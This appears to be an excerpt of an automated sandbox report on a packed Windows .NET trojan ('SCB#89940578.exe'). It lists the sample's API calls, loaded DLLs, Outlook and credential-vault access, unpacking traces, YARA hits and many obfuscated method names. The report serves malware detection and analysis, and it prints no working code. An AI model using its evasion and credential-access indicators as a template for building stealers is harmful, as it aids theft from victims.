Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, Ik0ivW0xlAKcCUFkH9.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, Ik0ivW0xlAKcCUFkH9.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, Ik0ivW0xlAKcCUFkH9.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, aAvuH1Zy2CffGkLMu1.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, aAvuH1Zy2CffGkLMu1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, aAvuH1Zy2CffGkLMu1.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, aAvuH1Zy2CffGkLMu1.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, aAvuH1Zy2CffGkLMu1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, aAvuH1Zy2CffGkLMu1.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, aAvuH1Zy2CffGkLMu1.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, aAvuH1Zy2CffGkLMu1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, aAvuH1Zy2CffGkLMu1.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/3@0/1

Source: C:\Users\user\Desktop\SCB#89940578.exe

Code function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

2_2_0040650A

Source: C:\Users\user\Desktop\SCB#89940578.exe

Code function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

2_2_0040434D

Source: C:\Users\user\Desktop\SCB#89940578.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SCB#89940578.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\SCB#89940578.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\Desktop\SCB#89940578.exe	Mutant created: NULL

Source: SCB#89940578.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SCB#89940578.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Users\user\Desktop\SCB#89940578.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SCB#89940578.exe "C:\Users\user\Desktop\SCB#89940578.exe"
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process created: C:\Users\user\Desktop\SCB#89940578.exe "C:\Users\user\Desktop\SCB#89940578.exe"
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process created: C:\Users\user\Desktop\SCB#89940578.exe "C:\Users\user\Desktop\SCB#89940578.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\SCB#89940578.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\SCB#89940578.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\SCB#89940578.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: SCB#89940578.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SCB#89940578.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.SCB#89940578.exe.7be0000.10.raw.unpack, V4uC3Iifq56IKQcfry.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.SCB#89940578.exe.3b19970.8.raw.unpack, V4uC3Iifq56IKQcfry.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: SCB#89940578.exe, Customer.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, aAvuH1Zy2CffGkLMu1.cs	.Net Code: OGs7AAbB2r System.Reflection.Assembly.Load(byte[])
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, aAvuH1Zy2CffGkLMu1.cs	.Net Code: OGs7AAbB2r System.Reflection.Assembly.Load(byte[])
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, aAvuH1Zy2CffGkLMu1.cs	.Net Code: OGs7AAbB2r System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SCB#89940578.exe PID: 7112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SCB#89940578.exe PID: 7272, type: MEMORYSTR

Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 2_2_00402AC0 push eax; ret		2_2_00402AD4
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: 2_2_00402AC0 push eax; ret		2_2_00402AFC

Source: SCB#89940578.exe

Static PE information: section name: .text entropy: 7.959447927229037

Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, KK8HF5OV0PrvkrfPAW.cs	High entropy of concatenated method names: 'ufDS7gIt9lVwV841YvS', 'Mhj20tI17NjEj8rCx75', 'UI7BoP4J8A', 'Qc8BHQBEbZ', 'ESsBUgERTR', 'b7b8e7IDW0XCclnfoWR', 'pLAGOTIk3pmHsjKCvfW'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, l5Me6QnMTckMyms01E.cs	High entropy of concatenated method names: 'GMMMPVLFau', 'IbrMkvsvqc', 'jiFM0nWY9w', 'GGdMn8lVHt', 'jTbMWSZZXV', 'SRcMdWrWnw', 'wgYM91Tclk', 'PQyMo4cylr', 'UQXMH1uOZa', 'OlGMUBs9H0'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, juoagBsKAnhO29XXUYd.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gTAURV8wrb', 'qyEUV1YLbG', 'ycUUjGL4OQ', 'V4vUSTg1Th', 'rFGUa7PfHa', 'mFDUC9ybEY', 'h4kUDPWaRv'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, HFCf2gSPskZCZYx2in.cs	High entropy of concatenated method names: 'k1S9q0pEAS', 'CYT9yaTZSP', 'ToString', 'G6q9GLQ2yW', 'aYV9upXG1n', 'xHh9MXyrru', 'STm9Q8RQ1R', 'U4o9Bb1wGq', 'gwq9Ewcxmw', 'sPW9ZH2fcZ'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, Ik0ivW0xlAKcCUFkH9.cs	High entropy of concatenated method names: 'cjCuRirHxc', 'LLYuVVJDLu', 'SUguj6ox60', 'nVmuSlT0p6', 'Ctuua8miw3', 'B9ruCxFfdv', 'UShuD8fOLO', 'i7Zu11YRdX', 'kSOub2INuJ', 'dmpuJ019so'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, P6ZjqJ3swucoCPdYU1.cs	High entropy of concatenated method names: 'AMoQhHpXl0', 'lVyQvrqRvM', 'dCQMfsBpWq', 'dqvMlu2gwr', 'vNLMpgPXNC', 'hrIMNt0mq3', 'fIPM51X0e4', 'AklM25R0ai', 'CXeMem2D65', 'PIhMtq0T5d'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, bomrjQeeRO7MjCq9JL.cs	High entropy of concatenated method names: 'Bx1EL81YBC', 'hdvEIsZQt8', 'CdEEAQpET8', 'CgaEPMTC8f', 'GJ0EhUfmPw', 'ob8EkUpQDd', 'c9TEvMSaBD', 'IKZE0UpahS', 'fsEEnCrFrY', 'cHJE350Owh'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, WfRbqtROjKsisi9C2c.cs	High entropy of concatenated method names: 'jNDWt67Piv', 'TMeWxe5oY8', 'B01WRoUl6q', 'n8NWVtkK3C', 'mAZWOnkmTC', 'IGJWfrgwQ4', 'Vq4Wl126G0', 'z7FWpmEkRo', 'aByWN1ENH6', 'RtGW5Lk4KI'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, QmlKtsm8sb4NYGqwub.cs	High entropy of concatenated method names: 'EU5BTrC1VM', 'rifBuvf6H5', 'RitBQiPg01', 'xPJBElHAQa', 'TFcBZ0GMTU', 'Y9GQaWwlPH', 'LWTQCdYIJG', 'Xh1QD38Fbq', 'ge3Q12vKk1', 'OX4QbLmKUO'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, LTk0Go7k75hJh3fWMD.cs	High entropy of concatenated method names: 'xrlsEk0ivW', 'PlAsZKcCUF', 'hMTsqckMym', 'b01syEx6Zj', 'AdYsWU16ml', 'ctssd8sb4N', 'fejxXoucjTS8gbwDkE', 'ChtqQcRkh51Owi4r9a', 'jcgssKuCwF', 'UdqsKgWQvn'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, EEsydkCYx57eeOBB6N.cs	High entropy of concatenated method names: 'YR691wgNFF', 'ECn9J1RxTh', 'VrZow3O1CQ', 'vvMosJQqAs', 'PcR9imLeqp', 'STl9x2k4vG', 'kp696WwSOw', 'b0g9RSJ394', 'Thq9VBO6NX', 'fPI9j7AmLK'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, OFNmdb1Z9H5cTqygQe.cs	High entropy of concatenated method names: 'moIoGPs5dx', 'NmGoul4j2M', 'ciMoMkPcrC', 'PjLoQYrIoJ', 'zBdoBJpVIr', 'u4WoEKAILs', 'COhoZxjXyK', 'Pj0oFXisww', 'DUYoqclf4G', 'xnooyx9l8G'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, wwHVEEjpM51biTRAEV.cs	High entropy of concatenated method names: 'ToString', 'bDpdiaM5yT', 'g4sdOVyhM2', 'nDUdfQXbgL', 'gEWdlsRIdh', 'btwdp6tIeO', 'GBfdNpK2vV', 'SeJd5nHKla', 'iCGd2aZ2ge', 'QAFdejksim'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, dDd5a9goxCsUjXNo8Z.cs	High entropy of concatenated method names: 'J03A5QJ8s', 'ylmPtmKGw', 'ET4kqWpyh', 'wFevCUmXi', 'ln8nOKiun', 'jWT3jqaSU', 'nB3JIunmCehlySBBjg', 'xKTLf7qXsk1FmSg90R', 'f3ocJbEwcGphOLjKmv', 'Xyqo0LrfG'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, aAvuH1Zy2CffGkLMu1.cs	High entropy of concatenated method names: 'lY8KTuG7oE', 'II1KGhN9E0', 'u4gKuieHTc', 'hsIKMvI9FH', 'CrPKQnoxUD', 'PUtKBl7roc', 'NYSKEA9mnT', 'RuTKZ4bVbZ', 'YB9KF4T8H1', 'PT9KqOoH5a'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, KhgswbJRLEXpkhV9SF.cs	High entropy of concatenated method names: 'FfbHstjnVN', 'FEGHK8mOsD', 'lo1H778CcT', 'lw2HGgjA2t', 'RuBHuPkCcQ', 'GXMHQGTQNH', 'GjWHB9HBEH', 'DTxoDbSb8Y', 'r7Zo103HmY', 'ncqobCI0PJ'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, RRfmNsut01lROUp1Bc.cs	High entropy of concatenated method names: 'Dispose', 'RObsb2aLNL', 'vDGgONmm0m', 'r8XddF9kFg', 'MiFsJNmdbZ', 'qH5szcTqyg', 'ProcessDialogKey', 'hedgwaT2vo', 'OTlgsXEGhe', 'jecgg5hgsw'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, K0FH4RswvYbcRDHFRPs.cs	High entropy of concatenated method names: 'GjFHLBcm14', 'AIjHIULV0g', 'lFHHASUMSI', 'nGCHPmZg4P', 'GRFHhllS74', 'FSrHk00eHV', 'qg7HviNEQr', 'iS7H00Wak1', 'qDTHnPdSyV', 'mdsH3ueRU6'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, Y6PglN5RDX6AyO2AUc.cs	High entropy of concatenated method names: 'jkAEGGdER2', 'Nt9EMt2UOD', 'HWgEB0KLOv', 'JjfBJoJdqG', 'PYEBzPA2up', 'qCcEwaq19n', 'pl4Esk8kp1', 'NDVEg0NfrM', 'HfmEKIcHOf', 'igiE7uSXS1'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, HP8UD46YAwT2bhahTv.cs	High entropy of concatenated method names: 'OLWr0B290C', 'jHYrnOAoJZ', 'Hs7rmpTI3e', 'wQwrOPhHDh', 'JoSrlmn8gU', 'E6FrpFQqn6', 'Dd1r5tT6iT', 'UKEr2GNwaV', 'D9VrthhxPs', 'MPprit71jq'
Source: 0.2.SCB#89940578.exe.7be0000.10.raw.unpack, V4uC3Iifq56IKQcfry.cs	High entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
Source: 0.2.SCB#89940578.exe.7be0000.10.raw.unpack, vpednoN8EZgsJ4TDwx.cs	High entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, KK8HF5OV0PrvkrfPAW.cs	High entropy of concatenated method names: 'ufDS7gIt9lVwV841YvS', 'Mhj20tI17NjEj8rCx75', 'UI7BoP4J8A', 'Qc8BHQBEbZ', 'ESsBUgERTR', 'b7b8e7IDW0XCclnfoWR', 'pLAGOTIk3pmHsjKCvfW'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, l5Me6QnMTckMyms01E.cs	High entropy of concatenated method names: 'GMMMPVLFau', 'IbrMkvsvqc', 'jiFM0nWY9w', 'GGdMn8lVHt', 'jTbMWSZZXV', 'SRcMdWrWnw', 'wgYM91Tclk', 'PQyMo4cylr', 'UQXMH1uOZa', 'OlGMUBs9H0'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, juoagBsKAnhO29XXUYd.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gTAURV8wrb', 'qyEUV1YLbG', 'ycUUjGL4OQ', 'V4vUSTg1Th', 'rFGUa7PfHa', 'mFDUC9ybEY', 'h4kUDPWaRv'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, HFCf2gSPskZCZYx2in.cs	High entropy of concatenated method names: 'k1S9q0pEAS', 'CYT9yaTZSP', 'ToString', 'G6q9GLQ2yW', 'aYV9upXG1n', 'xHh9MXyrru', 'STm9Q8RQ1R', 'U4o9Bb1wGq', 'gwq9Ewcxmw', 'sPW9ZH2fcZ'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, Ik0ivW0xlAKcCUFkH9.cs	High entropy of concatenated method names: 'cjCuRirHxc', 'LLYuVVJDLu', 'SUguj6ox60', 'nVmuSlT0p6', 'Ctuua8miw3', 'B9ruCxFfdv', 'UShuD8fOLO', 'i7Zu11YRdX', 'kSOub2INuJ', 'dmpuJ019so'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, P6ZjqJ3swucoCPdYU1.cs	High entropy of concatenated method names: 'AMoQhHpXl0', 'lVyQvrqRvM', 'dCQMfsBpWq', 'dqvMlu2gwr', 'vNLMpgPXNC', 'hrIMNt0mq3', 'fIPM51X0e4', 'AklM25R0ai', 'CXeMem2D65', 'PIhMtq0T5d'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, bomrjQeeRO7MjCq9JL.cs	High entropy of concatenated method names: 'Bx1EL81YBC', 'hdvEIsZQt8', 'CdEEAQpET8', 'CgaEPMTC8f', 'GJ0EhUfmPw', 'ob8EkUpQDd', 'c9TEvMSaBD', 'IKZE0UpahS', 'fsEEnCrFrY', 'cHJE350Owh'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, WfRbqtROjKsisi9C2c.cs	High entropy of concatenated method names: 'jNDWt67Piv', 'TMeWxe5oY8', 'B01WRoUl6q', 'n8NWVtkK3C', 'mAZWOnkmTC', 'IGJWfrgwQ4', 'Vq4Wl126G0', 'z7FWpmEkRo', 'aByWN1ENH6', 'RtGW5Lk4KI'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, QmlKtsm8sb4NYGqwub.cs	High entropy of concatenated method names: 'EU5BTrC1VM', 'rifBuvf6H5', 'RitBQiPg01', 'xPJBElHAQa', 'TFcBZ0GMTU', 'Y9GQaWwlPH', 'LWTQCdYIJG', 'Xh1QD38Fbq', 'ge3Q12vKk1', 'OX4QbLmKUO'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, LTk0Go7k75hJh3fWMD.cs	High entropy of concatenated method names: 'xrlsEk0ivW', 'PlAsZKcCUF', 'hMTsqckMym', 'b01syEx6Zj', 'AdYsWU16ml', 'ctssd8sb4N', 'fejxXoucjTS8gbwDkE', 'ChtqQcRkh51Owi4r9a', 'jcgssKuCwF', 'UdqsKgWQvn'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, EEsydkCYx57eeOBB6N.cs	High entropy of concatenated method names: 'YR691wgNFF', 'ECn9J1RxTh', 'VrZow3O1CQ', 'vvMosJQqAs', 'PcR9imLeqp', 'STl9x2k4vG', 'kp696WwSOw', 'b0g9RSJ394', 'Thq9VBO6NX', 'fPI9j7AmLK'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, OFNmdb1Z9H5cTqygQe.cs	High entropy of concatenated method names: 'moIoGPs5dx', 'NmGoul4j2M', 'ciMoMkPcrC', 'PjLoQYrIoJ', 'zBdoBJpVIr', 'u4WoEKAILs', 'COhoZxjXyK', 'Pj0oFXisww', 'DUYoqclf4G', 'xnooyx9l8G'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, wwHVEEjpM51biTRAEV.cs	High entropy of concatenated method names: 'ToString', 'bDpdiaM5yT', 'g4sdOVyhM2', 'nDUdfQXbgL', 'gEWdlsRIdh', 'btwdp6tIeO', 'GBfdNpK2vV', 'SeJd5nHKla', 'iCGd2aZ2ge', 'QAFdejksim'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, dDd5a9goxCsUjXNo8Z.cs	High entropy of concatenated method names: 'J03A5QJ8s', 'ylmPtmKGw', 'ET4kqWpyh', 'wFevCUmXi', 'ln8nOKiun', 'jWT3jqaSU', 'nB3JIunmCehlySBBjg', 'xKTLf7qXsk1FmSg90R', 'f3ocJbEwcGphOLjKmv', 'Xyqo0LrfG'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, aAvuH1Zy2CffGkLMu1.cs	High entropy of concatenated method names: 'lY8KTuG7oE', 'II1KGhN9E0', 'u4gKuieHTc', 'hsIKMvI9FH', 'CrPKQnoxUD', 'PUtKBl7roc', 'NYSKEA9mnT', 'RuTKZ4bVbZ', 'YB9KF4T8H1', 'PT9KqOoH5a'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, KhgswbJRLEXpkhV9SF.cs	High entropy of concatenated method names: 'FfbHstjnVN', 'FEGHK8mOsD', 'lo1H778CcT', 'lw2HGgjA2t', 'RuBHuPkCcQ', 'GXMHQGTQNH', 'GjWHB9HBEH', 'DTxoDbSb8Y', 'r7Zo103HmY', 'ncqobCI0PJ'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, RRfmNsut01lROUp1Bc.cs	High entropy of concatenated method names: 'Dispose', 'RObsb2aLNL', 'vDGgONmm0m', 'r8XddF9kFg', 'MiFsJNmdbZ', 'qH5szcTqyg', 'ProcessDialogKey', 'hedgwaT2vo', 'OTlgsXEGhe', 'jecgg5hgsw'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, K0FH4RswvYbcRDHFRPs.cs	High entropy of concatenated method names: 'GjFHLBcm14', 'AIjHIULV0g', 'lFHHASUMSI', 'nGCHPmZg4P', 'GRFHhllS74', 'FSrHk00eHV', 'qg7HviNEQr', 'iS7H00Wak1', 'qDTHnPdSyV', 'mdsH3ueRU6'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, Y6PglN5RDX6AyO2AUc.cs	High entropy of concatenated method names: 'jkAEGGdER2', 'Nt9EMt2UOD', 'HWgEB0KLOv', 'JjfBJoJdqG', 'PYEBzPA2up', 'qCcEwaq19n', 'pl4Esk8kp1', 'NDVEg0NfrM', 'HfmEKIcHOf', 'igiE7uSXS1'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, HP8UD46YAwT2bhahTv.cs	High entropy of concatenated method names: 'OLWr0B290C', 'jHYrnOAoJZ', 'Hs7rmpTI3e', 'wQwrOPhHDh', 'JoSrlmn8gU', 'E6FrpFQqn6', 'Dd1r5tT6iT', 'UKEr2GNwaV', 'D9VrthhxPs', 'MPprit71jq'
Source: 0.2.SCB#89940578.exe.3b19970.8.raw.unpack, V4uC3Iifq56IKQcfry.cs	High entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
Source: 0.2.SCB#89940578.exe.3b19970.8.raw.unpack, vpednoN8EZgsJ4TDwx.cs	High entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, KK8HF5OV0PrvkrfPAW.cs	High entropy of concatenated method names: 'ufDS7gIt9lVwV841YvS', 'Mhj20tI17NjEj8rCx75', 'UI7BoP4J8A', 'Qc8BHQBEbZ', 'ESsBUgERTR', 'b7b8e7IDW0XCclnfoWR', 'pLAGOTIk3pmHsjKCvfW'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, l5Me6QnMTckMyms01E.cs	High entropy of concatenated method names: 'GMMMPVLFau', 'IbrMkvsvqc', 'jiFM0nWY9w', 'GGdMn8lVHt', 'jTbMWSZZXV', 'SRcMdWrWnw', 'wgYM91Tclk', 'PQyMo4cylr', 'UQXMH1uOZa', 'OlGMUBs9H0'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, juoagBsKAnhO29XXUYd.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gTAURV8wrb', 'qyEUV1YLbG', 'ycUUjGL4OQ', 'V4vUSTg1Th', 'rFGUa7PfHa', 'mFDUC9ybEY', 'h4kUDPWaRv'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, HFCf2gSPskZCZYx2in.cs	High entropy of concatenated method names: 'k1S9q0pEAS', 'CYT9yaTZSP', 'ToString', 'G6q9GLQ2yW', 'aYV9upXG1n', 'xHh9MXyrru', 'STm9Q8RQ1R', 'U4o9Bb1wGq', 'gwq9Ewcxmw', 'sPW9ZH2fcZ'
